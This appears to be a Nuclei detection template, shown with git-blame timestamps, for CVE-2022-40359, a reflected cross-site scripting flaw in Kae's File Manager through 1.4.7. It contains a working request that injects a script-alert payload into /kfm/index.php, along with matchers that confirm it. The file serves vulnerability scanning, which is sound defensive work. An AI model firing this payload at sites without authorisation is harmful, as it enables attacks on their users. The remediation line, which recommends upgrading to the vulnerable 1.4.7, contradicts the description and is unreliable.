nuclei-templates/http/cves/2022/CVE-2022-40359.yaml

58 lines
2.2 KiB
YAML
Raw Permalink Normal View History

2022-10-04 12:58:20 +00:00
id: CVE-2022-40359
info:
name: Kae's File Manager <=1.4.7 - Cross-Site Scripting
2022-10-04 17:05:30 +00:00
author: edoardottt,daffainfo
2022-10-04 12:58:20 +00:00
severity: medium
description: |
Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade to the latest version of Kae's File Manager plugin (1.4.7) or apply the vendor-provided patch to mitigate the XSS vulnerability.
2022-10-04 12:58:20 +00:00
reference:
- https://cxsecurity.com/issue/WLB-2022090057
- https://code.google.com/archive/p/kfm/downloads
- https://nvd.nist.gov/vuln/detail/CVE-2022-40359
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2022-10-04 12:58:20 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-10-04 12:58:20 +00:00
cve-id: CVE-2022-40359
cwe-id: CWE-79
epss-score: 0.00129
epss-percentile: 0.46796
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:*
2022-11-11 10:12:39 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: kfm_project
product: kfm
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,xss,kfm,kfm_project
2022-10-04 12:58:20 +00:00
http:
2022-10-04 12:58:20 +00:00
- raw:
- |
2022-10-04 17:05:30 +00:00
GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1
2022-10-04 12:58:20 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-10-04 17:05:30 +00:00
- "<script>alert(document.domain);</script>"
- "x_kfm_changeCaption"
- "kfm_copyFiles"
2022-11-11 10:12:39 +00:00
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a004730450220171d85e0f730e64868dee2a05909f6c686e599f48f3696442a181b69884cf50f022100c1f6c50e667cb2eb97f58eadec05e4db8a84fdda96907fa4c22f023609840b63:922c64590222798bb761d5b6d8e72950